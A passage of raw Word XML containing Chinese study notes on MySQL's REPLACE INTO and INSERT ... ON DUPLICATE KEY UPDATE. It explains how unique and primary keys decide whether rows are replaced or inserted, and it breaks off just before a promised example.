      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，而非</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>索引（加快查询速度</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1B5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198177A" w14:textId="42DEABEC" w:rsidR="00D45C51" w:rsidRDefault="00D45C51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面加的数据如果没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r w:rsidR="000F5423">
        <w:t>(primary key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以，有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UK</w:t>
      </w:r>
      <w:r w:rsidR="000F5423">
        <w:t>(unique key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行，不会多插入数据，而是修改数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C9633C" w14:textId="77777777" w:rsidR="00D45C51" w:rsidRDefault="00D45C51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那就会新增数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503DA0F" w14:textId="1FD146A5" w:rsidR="00D45C51" w:rsidRPr="00D45C51" w:rsidRDefault="00D45C51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8FEF93" w14:textId="77777777" w:rsidR="00D45C51" w:rsidRDefault="00D45C51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653C1C0A" w14:textId="42A24D9C" w:rsidR="0084400F" w:rsidRDefault="0084400F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在向表中插入数据的时候，经常遇到这样的情况：</w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先判断数据是否存在；</w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. </w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果不存在，则插入；</w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="0084400F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果存在，则更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67882712" w14:textId="77777777" w:rsidR="0084400F" w:rsidRDefault="0084400F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0EA8B9" w14:textId="77777777" w:rsidR="00101396" w:rsidRDefault="00101396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if not exists (select 1 from t where id = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BCAC6" w14:textId="77777777" w:rsidR="00101396" w:rsidRDefault="00101396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      insert into t(id, update_time) values(1, getdate())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EFAA6" w14:textId="77777777" w:rsidR="00101396" w:rsidRDefault="00101396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77507C" w14:textId="46F2A1B9" w:rsidR="0024334F" w:rsidRDefault="00101396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      update t set update_time = getdate() where id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35ECF3" w14:textId="4BCFFE51" w:rsidR="0024334F" w:rsidRDefault="0024334F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0D3DB0" w14:textId="77777777" w:rsidR="00C618EE" w:rsidRDefault="00C618EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">replace into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> insert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能类似，不同点在于：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">replace into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先尝试插入数据到表中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1605">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1605">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果发现表中已经有此行数据（根据主键或者唯一索引判断）则先删除此行数据，然后插入新的数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1605">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1605">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>否则，直接插入新数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A046F70" w14:textId="77777777" w:rsidR="00C618EE" w:rsidRDefault="00C618EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055C53AE" w14:textId="51D7645D" w:rsidR="0024334F" w:rsidRPr="00B97E58" w:rsidRDefault="00C618EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B482F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>要注意的是：插入数据的表必须有主键或者是</w:t>
      </w:r>
      <w:r w:rsidR="00B97E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00B97E58">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>niq</w:t>
      </w:r>
      <w:r w:rsidR="00B97E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00B97E58">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00B97E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>约束</w:t>
      </w:r>
      <w:r w:rsidRPr="000B482F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>！否则的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="000B482F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">replace into </w:t>
      </w:r>
      <w:r w:rsidRPr="000B482F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会直接插入数据，这将导致表中出现重复的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E72753" w14:textId="78DC4855" w:rsidR="0024334F" w:rsidRDefault="0024334F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A056EFE" w14:textId="06BF3437" w:rsidR="00BA54C4" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是希望只根据其中一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64609F10" w14:textId="77777777" w:rsidR="00A0611F" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1324EBA8" w14:textId="691E86B8" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不幸的是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">REPLACE INTO </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>语句会根据所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIQUE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMARY KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来检查冲突，你不能指定它只根据其中一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIQUE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来插入或更新数据。如果新数据与任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIQUE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMARY KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>冲突，</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">REPLACE INTO </w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都会删除旧数据，然后插入新数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（个人总结，replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> into</w:t>
      </w:r>
      <w:r w:rsidRPr="00273BE2">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是必须根据所有有 约束 的字段，而无法指定其中某个约束）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8E0DB" w14:textId="77777777" w:rsidR="00F45955" w:rsidRDefault="00F45955" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451BDA81" w14:textId="77777777" w:rsidR="00F45955" w:rsidRDefault="00F45955" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33604360" w14:textId="0F26553D" w:rsidR="00F45955" w:rsidRDefault="00F45955" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我的实验：比如purl和uuid都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>key，如果此时你插入数据，uuid重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>purl不同，则mysql会删除uuid重复的数据，然后更新purl数据</w:t>
      </w:r>
      <w:r w:rsidR="00950AAC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="008950BF">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>uuid和purl的重复性反之也一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A539071" w14:textId="77777777" w:rsidR="002655D1" w:rsidRDefault="002655D1" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A713DA3" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35565322" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你</w:t>
      </w:r>
      <w:r w:rsidRPr="002614AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>希望根据</w:t>
      </w:r>
      <w:r w:rsidRPr="002614AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个特定的</w:t>
      </w:r>
      <w:r w:rsidRPr="002614AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIQUE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="002614AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来插入或更新数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可能需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D62AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。这个语句会首先尝试插入新数据，如果没有任何冲突，那么新数据就会被插入。如果有冲突，那么它会更新那些与新数据冲突的旧行。你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UPDATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分指定哪些列应该被更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC00CAD" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B33412" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，假设你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表有两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNIQUE KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">uuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> purl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>希望</w:t>
      </w:r>
      <w:r w:rsidRPr="00730733">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">根据 uuid </w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来插入或更新数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以这样写：</w:t>
      </w:r>
    </w:p>
